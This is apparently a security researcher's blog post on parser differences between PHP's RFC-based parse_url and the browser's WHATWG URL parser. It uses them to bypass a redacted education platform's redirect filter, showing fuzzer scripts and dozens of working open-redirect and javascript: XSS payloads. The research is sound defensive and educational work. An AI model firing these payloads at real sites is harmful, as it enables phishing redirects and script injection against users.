A Research Of The Inconsistency Between WHATWG URL standard And RFC URL standard

Table of Contents

In August 2022, when digging the SRC of Tianrongxin, I found that redacted teaching and training system was used in a site of Tianrongxin Education, so I downloaded the source code of redacted on github and audited it.

Source & Sink
#

According to the audit, redacted Education and training system uses goto parameter in many places to achieve page redirection, such as login function:

http://demo.redacted.com/login?goto=/

If a logged-in user accesses this URL, the back-end reads the value of the goto parameter and fills it into the custom property data-goto of the div tag in the twig template:

{% block content %}
<div id="page-message-container" class="page-message-container" data-goto="{{ goto }}" data-duration={{ duration }}>
<div class="page-message-panel">
<div class="page-message-heading">
<h2 class="page-message-title">{{ title|trans }}</h2>
</div>
<div class="page-message-body">{{ message|default('')|trans|raw }}</div>
</div>
</div>
{% endblock %}

Then, the front-end reads the value of data-goto property through the following js code, and jumps to the page through window.location.href :

function (e, t) {
var n = $("#page-message-container"),
r = n.data("goto"),
o = n.data("duration");
o > 0 && r && setTimeout((function () {
window.location.href = r
}), o)
}

Sanitizer/Filter
#

In order to prevent the occurrence of open redirection vulnerability (OR) and XSS in the process of page redirection, redacted specially writes a filter on the back end to filter the URL in the goto parameter:

/ * *
* Filter urls.
*
* If the url does not belong to a domain name other than this site, return to the home address of this site.
*
* @param $url string $url to be filtered
*
* @return string
* /
public function filterRedirectUrl($url)
{
$host = $this->get('request_stack')->getCurrentRequest()->getHost();
$safeHosts = [$host];

$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);

if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
$url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}

return strip_tags($url);
}

The filter works as follows:

Obtain the Host header in the http request packet and use it as the host whitelist
Set protocol whitelists to http and https
Use PHP’s URL parser to parse the incoming URL and get the host part and scheme part
If the host part and the scheme part exist, check whether the host part belongs to the host whitelist and the scheme part belongs to the scheme whitelist
Otherwise, it is assumed that the user passed in a relative URL

Bypass the host check
#

How do I bypass filter’s host check? The following payload comes to mind:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/

The payload works because of the inconsistency between the front-end and back-end URL parsers:

parse_url of PHP considers the host part of the URL to be demo.redacted.com, which is the same as the Host request in the http request packet. Therefore, the check is passed.
But the javascript URL parser doesn’t think so: the js URL parser normalizes \ to /, so the payload is normalized into the following URL:

http://baidu.com/@demo.redacted.com/

Therefore, the front-end considers the host part of the URL to be baidu.com.

PHP URL parser:

php -r "var_dump(parse_url('http://baidu.com\@demo.redacted.com/'));"
Command line code:1:
array(4) {
  'scheme' =>
  string(4) "http"
  'host' =>
  string(16) "demo.redacted.com"
  'user' =>
  string(10) "baidu.com\"
  'path' =>
  string(1) "/"
}

Javascript URL parser:

> new URL('http://baidu.com\\@demo.redacted.com/')
URL {origin: 'http://baidu.com', protocol: 'http:', username: ', password: ', host: 'baidu.com',... }
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/@demo.redacted.com/"
origin: "http://baidu.com"
password: ""
pathname: "/@demo.redacted.com/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

A point of note when \ is the js escape symbol, such as: hexadecimal encoding \x61, and control character encoding \n…

So it’s escaped again in the demo code above

Bypass scheme check
#

By simply bypassing host checking, we can only create an open redirection vulnerability. To cause xss, we also need to bypass protocol checking on the back end. How do we bypass protocol checking on the back end?

We can try to start with the following idea: since vulnerability are often due to some false assumptions of the program, we can try to find out what false assumptions filter has, and then try to break it.

$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);

if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
    $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);

Looking back at the filter code above, filter assumes:

If the host and scheme parts cannot be resolved from the URL, it must be a relative URL
Relative URL must be secure.

So what happens if we make parse_url return false?

false['host'] === NULL
false['scheme'] === NULL

parse_url will assume that the URL passed in by the user has no host and scheme parts, so it’s a relative URL! Relative urls must be safe and can be returned directly to the front end.

How do we make parse_url return false?

The PHP URL parser is just an implementation of the RFC standard, so if the URL passed in does not conform to the RFC specification, then the parse_url will return false

A classic payload, for example, is a much simpler way to cause open redirects:

https://demo.redacted.com/login?goto=http:///baidu.com

RFC 1738 states that the absolute URL of the hierarchy must exclude the protocol part and subsequent parts must begin with //

The scheme specific data start with a double slash “//” to indicate that it complies with the common Internet scheme syntax.

So PHP’s URL parser thinks that http:///baidu.com is an illegal URL, so it simply returns false, bypassing the follow-up check and returning it to the front end.

But the front-end URL parser doesn’t think so, and normalizes http:///baidu.com to http://baidu.com:

> new URL('http:///baidu.com')
URL {origin: 'http://baidu.com', protocol: 'http:', username: ', password: ', host: 'baidu.com',... }
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/"
origin: "http://baidu.com"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

So there is an OR vulnerability.

What about swapping http for javascript? The RFC document only specifies that hierarchical urls must contain the ‘//’ prefix, but does not specify what should the URL parser do if a non-hierarchical URL contains a ‘//’ prefix

for example:

javascript:alert(1) ---> javascript://alert(1)
mailto:happyhacking@qq.com ---> mailto://happyhacking@qq.com

So I thought of payload:

https://demo.redacted.com/login?goto=javascript:///%250dalert(1)

PHP’s URL parser considers javascript:///%250dalert(1) to be an illegal URL and returns false, so filter skips protocol checking and simply considers it to be a safe relative URL.

php -r "var_dump(parse_url('javascript:///%250dalert(1)'));"        
Command line code:1:
bool(false)

But the front-end URL parser has its own ideas:

The payload reflected to the front looks like this:

window.location.href = 'javascript:///%0dalert(1)'

The front-end URL parser decodes the URL first, decoding ‘%0d’ into ‘\n’, and the protocol parsed into is named javascript, so it switches to the js resolver, which thinks’ // ‘is a single line comment, alert(1) is the next line of js code after the newline.

So we have a XSS vulnerability!

Further Research
#

Can we further search for more inconsistencies between the js URL parser and the php URL parser by writing fuzzer?

Qustion1: http:{char}//localhost:80/xxxx
#

Can we find a character between http: and // that the front-end URL parser still considers the host part of the URL to be localhost after we fill it into the {char} position?

So I wrote the following fuzzer:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('http:'+String.fromCodePoint(i)+'//localhost:80/xxxx')
  if(url['host'] == 'localhost' ){
    console.log(i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)))
    log.push(i);
  }
  }catch(e){}
}
log

Output:

9 URL encoded i : %09
10 URL encoded i : %0A
13 URL encoded i : %0D
47 URL encoded i : /
92 URL encoded i : %5C
(5) [9, 10, 13, 47, 92]

So how does PHP’s URL parser parse_url parse these payloads?

 ["http:%09//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%09//localhost"
  }
  ["http:   //localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "   //localhost"
  }
  ["http:%0a//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%0a//localhost"
  }
  ["http:\//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(12) "\//localhost"
  }
  ["http:///localhost"]=>
  bool(false)

As you can see, the parse_url faced with these payloads, either thinks that everything after http: is the path portion, or it thinks that the URL is an illegal URL and returns false

In other words, the following payloads can also bypass redacted’s URL filter, causing open redirects:

https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com

Question2: http{char}://localhost:80/xxxx
#

Can we find a character between ‘http’ and ‘://’ that still makes the front-end URL parser think that the host part of the URL is localhost and the scheme part is http?

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('http'+String.fromCodePoint(i)+'://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
    console.log(url);
    log.push(i);
  }
  }catch(e){}
}
log

Running results of the front-end URL parser:

VM437:7 9:  URL encoded i : %09
VM437:7 10:  URL encoded i : %0A
VM437:7 13:  URL encoded i : %0D

This time it only gets three characters, minus /and \, and gets the following three payloads

http%09://baidu.com
http%0a://baidu.com
http%0d://baidu.com

How does PHP’s URL parser parse these payloads?

  ["http%09://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%09://localhost:80/xxx"
  }
  ["http%0a://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0a://localhost:80/xxx"
  }
  ["http%0d://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0d://localhost:80/xxx"
  }

This bypasses both filter’s protocol check and host check:

window.location.href='http%0a://localhost:80/xxx' // exception
window.location.href='http\n://localhost:80/xxx' // work
window.location.href='javascript\n:alert(1)' // work
window.location.href='javascript\r:alert(1)' // work
window.location.href='javascript\t:alert(1)' // work

payload:

https://demo.redacted.com/login?goto=javascript%0d:alert(1) //work！
https://demo.redacted.com/login?goto=javascript%0a:alert(1) //work！
https://demo.redacted.com/login?goto=javascript%09:alert(1) //work！
https://demo.redacted.com/login?goto=http%09://baidu.com //work

Question3: {char}http://localhost:80/xxxx
#

Can we find a character before the ‘http’ protocol, fill it in, and still make the front-end URL parser think that the host part of the URL is localhost and the scheme part is http?

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL(String.fromCodePoint(i)+'http://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log(`i: ${i} ,URL encoded i : `+encodeURI(String.fromCodePoint(i))+' string begin:'+String.fromCodePoint(i)+'string end')
    log.push(i);
  }
  }catch(e){}
}
log
log.forEach(i=>{
    //console.log(encodeURI(String.fromCodePoint(i))+'http://localhost:80/xxxx')
    console.log(encodeURI(String.fromCodePoint(i))+'javascript:alert(1)')
})

payloads:

%00http://localhost:80/xxxx
%01http://localhost:80/xxxx
%02http://localhost:80/xxxx
%03http://localhost:80/xxxx
%04http://localhost:80/xxxx
%05http://localhost:80/xxxx
%06http://localhost:80/xxxx
%07http://localhost:80/xxxx
%08http://localhost:80/xxxx
%09http://localhost:80/xxxx
%0Ahttp://localhost:80/xxxx
%0Bhttp://localhost:80/xxxx
%0Chttp://localhost:80/xxxx
%0Dhttp://localhost:80/xxxx
%0Ehttp://localhost:80/xxxx
%0Fhttp://localhost:80/xxxx
%10http://localhost:80/xxxx
%11http://localhost:80/xxxx
%12http://localhost:80/xxxx
%13http://localhost:80/xxxx
%14http://localhost:80/xxxx
%15http://localhost:80/xxxx
%16http://localhost:80/xxxx
%17http://localhost:80/xxxx
%18http://localhost:80/xxxx
%19http://localhost:80/xxxx
%1Ahttp://localhost:80/xxxx
%1Bhttp://localhost:80/xxxx
%1Chttp://localhost:80/xxxx
%1Dhttp://localhost:80/xxxx
%1Ehttp://localhost:80/xxxx
%1Fhttp://localhost:80/xxxx
%20http://localhost:80/xxxx

Replace the http protocol with the javascript protocol:

%00javascript:alert(1)
%01javascript:alert(1)
%02javascript:alert(1)
%03javascript:alert(1)
%04javascript:alert(1)
%05javascript:alert(1)
%06javascript:alert(1)
%07javascript:alert(1)
%08javascript:alert(1)
%09javascript:alert(1)
%0Ajavascript:alert(1)
%0Bjavascript:alert(1)
%0Cjavascript:alert(1)
%0Djavascript:alert(1)
%0Ejavascript:alert(1)
%0Fjavascript:alert(1)
%10javascript:alert(1)
%11javascript:alert(1)
%12javascript:alert(1)
%13javascript:alert(1)
%14javascript:alert(1)
%15javascript:alert(1)
%16javascript:alert(1)
%17javascript:alert(1)
%18javascript:alert(1)
%19javascript:alert(1)
%1Ajavascript:alert(1)
%1Bjavascript:alert(1)
%1Cjavascript:alert(1)
%1Djavascript:alert(1)
%1Ejavascript:alert(1)
%1Fjavascript:alert(1)
%20javascript:alert(1)

How does PHP’s URL parser parse these payloads?

  ["%00http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%00http://localhost:80/xxxx"
  }
  ["%01http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%01http://localhost:80/xxxx"
  }
  ["%1Djavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Djavascript:alert(1)"
  }
  ["%1Ejavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Ejavascript:alert(1)"
  }

PHP’s URL parser considers the entire URL to be a relative URL

Therefore, the following payloads can bypass protocol check and host check of the redacted filter:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)

Question4: ht{char}tp://localhost:80/xxxx
#

Let’s be a little more adventurous, can we find a character between ht and tp that the front-end URL parser still thinks the scheme part of the URL is http and the host part is localhost?

fuzzer:

log=[];
for(i=0;i<0x10ffff;i++){
  try{
  let url = new URL('ht'+String.fromCodePoint(i)+'tp://localhost:80/xxxx')
  if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
    console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
    console.log(url);
    log.push(i);
  }
  }catch(e){}
}
log

Output:

i: 9 URL encoded i : %09 debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
i: 10 URL encoded i : %0A debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
i: 13 URL encoded i : %0D debugger eval code:6:13
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
debugger eval code:7:13
Array(3) [ 9, 10, 13 ]

payloads:

ht%0dtp://localhost
ht%0atp://localhost
ht%09tp://localhost
java%09script:alert(1)
java%0dscript:alert(1)
java%0ascript:alert(1)

So how does PHP’s URL parser handle these malformed urls?

  ["ht%0dtp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0dtp://localhost"
  }
  ["ht%0atp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0atp://localhost"
  }
  ["ht%09tp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%09tp://localhost"
  }
  ["java%09script:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%09script:alert(1)"
  }
  ["java%0dscript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0dscript:alert(1)"
  }
  ["java%0ascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0ascript:alert(1)"
  }

Once again, PHP’s URL parser considers these urls to be ‘canonical’ relative urls, all of which pass redacted fitler’s check

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)

These three characters can actually be placed anywhere in scheme:

https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

Summary
#

By further studying the inconsistency between javascript URL parser and php URL parser, I found more than 40 methods to bypass redacted filter:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
https://demo.redacted.com/login?goto=http:///www.baidu.com
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
https://demo.redacted.com/login?goto=javascript%0d:alert(1) 
https://demo.redacted.com/login?goto=javascript%0a:alert(1) 
https://demo.redacted.com/login?goto=javascript%09:alert(1) 
https://demo.redacted.com/login?goto=http%09://baidu.com 
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

The root cause
#

Why is there such a big inconsistency between javascript URL parser and PHP URL parser?

Because there are two URL resolution standards: the RFC standard and the WHATWG standard

javascript URL parser follows the WHATWG standard, while PHP URL parser and other back-end language(excluding Nodejs) URL Parsers follow the RFC specification !

The WHATWG has developed its own set of standards based on the RFC standard: URL parsing

Here’s what the WHATWG spec says:

If input contains any leading or trailing C0 control or space, validation error.

Remove any leading and trailing C0 control or space from input.

If the input URL starts and ends with the C0 controller and space, a validtion error is reported and all the C0 controllers and Spaces given in the input are deleted, where the range of C0 control is: 0x00-0x1F, the range of space is 0x20, so the range of C0 control + space is 0x00-0x20

So what is the validation error?

The WHATWG standard is to say:

A validation error indicates a mismatch between input and valid input. User agents, especially conformance checkers, are encouraged to report them somewhere.A validation error does not mean that the parser terminates. Termination of a parser is always stated explicitly, e.g., through a return statement.

A validtion error simply indicates a mismatch between input and valid input, and does not imply parsing termination. The standard encourages implementers to report it somewhere, and parser termination is always explicitly stated, for example, by a return statement.

That’s why these payloads work:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
...
https://demo.redacted.com/login?goto=%20javascript:alert(1)

And then the WHATWG standard says:

If input contains any ASCII tab or newline, validation error.

Remove all ASCII tab or newline from input.

Scope of ASCII TAB or newline:

An ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.

That’s why these payloads work:

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

This means that %0d %0a %09 can be placed anywhere in the URL, since js URL parser will remove them anyway, for example

new URL('http:/\x09/baidu.com') 

URL {
    origin: 'http://baidu.com', 
    protocol: 'http:', 
    username: '', 
    password: '', 
    host: 'baidu.com'
}

Summary
#

The worst thing in the world is having two sets of standards for the same thing. If there is inconsistency in the standards, there will inevitably be inconsistency in the implementation. Security issues arising from inconsistencies are concealed because when you audit a single system, you may think there are no security problems. However, when you connect multiple systems to work together, security issues will emerge. This also illustrates that when auditing security issues, it is necessary to consider the overall situation rather than auditing a single system.

At the same time, it is worth noting that wherever standards and specifications are not clearly defined or ambiguous, there will be discrepancies in understanding among developers who implement the standards. This can lead to inconsistencies between various languages, libraries, frameworks, and software that follow the standard implementation. Such inconsistencies are fertile ground for creating new attack techniques.

Keep in touch
#

If you have any questions or good research direction, please feel free to contact me:

Email: hdrw1024@gmail.com
Twitter: https://twitter.com/RuiShang9
Blog: https://shangrui-hash.github.io/en/
Medium: https://medium.com/@hdrw1024
Github: https://github.com/ShangRui-hash

Source & Sink #

Sanitizer/Filter #

Bypass the host check #

Bypass scheme check #

Further Research #

Qustion1: http:{char}//localhost:80/xxxx #

Question2: http{char}://localhost:80/xxxx #

Question3: {char}http://localhost:80/xxxx #

Question4: ht{char}tp://localhost:80/xxxx #

Summary #

The root cause #

Summary #

Keep in touch #

Reference #

Source & Sink
#

Sanitizer/Filter
#

Bypass the host check
#

Bypass scheme check
#

Further Research
#

Qustion1: http:{char}//localhost:80/xxxx
#

Question2: http{char}://localhost:80/xxxx
#

Question3: {char}http://localhost:80/xxxx
#

Question4: ht{char}tp://localhost:80/xxxx
#

Summary
#

The root cause
#

Summary
#

Keep in touch
#

Reference
#